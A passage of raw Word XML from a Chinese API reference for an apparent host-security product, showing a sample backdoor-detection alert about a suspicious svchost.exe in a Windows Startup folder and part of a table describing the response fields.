      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "未分组主机（Windows）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "ADMIN-PC",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backDoorTypeId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "进程svchost.exe加载异常网络模块",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "reason": "进程svchost.exe存在被动态加载的网络模块，如果不是正常的挂载，那么极有可能被窃取信息",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "item": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1712,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "b_wow64": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1480,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "b_64bit": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>create_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1512045079,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "svchost.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>image_file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret_msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "dynamic load network module process",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x00000005"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CAE870"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767"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="4090"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="38085B0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143D4CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22477439" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A426795" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="508C78EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58D90231" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3399EB5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32E779B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="753487DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B4D2031" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42FCAC93" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1835FE86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A7223A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37CEE116" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="169DE8E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E0B7573" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72756841" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D2D7230" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7382568E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3F6B7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6139C2C2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38A58ADA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41CCB160" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64BD8418" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55816CDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="47E4492F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF164F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ABB456C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D633D71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5338DF88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="218401AC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BD875AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A275360" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31B66870" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DD14D01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A076292" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6040E2F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="344F5859" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62FD2087" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23D5BED9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="51DB26DC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="685D6FC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6395FEFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C63CD49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BC724C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4BFECBF3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F6E98DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30EB5969" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD1E60A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4272DFC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2DA1A33B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08E30525" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08490415" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="742E5079" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FD230A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="062F7E25" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CFFCE20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C93643C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D793DFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F4C1E33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>问题摘要</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="443ECFD8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67070F55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14E40B12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B896731" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31487860" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>后门类型，见</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>《Windows后门类型字典表》</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59284981" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38B86A8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15DCC8AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="520AFDFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ABEEA1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常原因，恶意进程中为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1639EF43" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7998B413" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
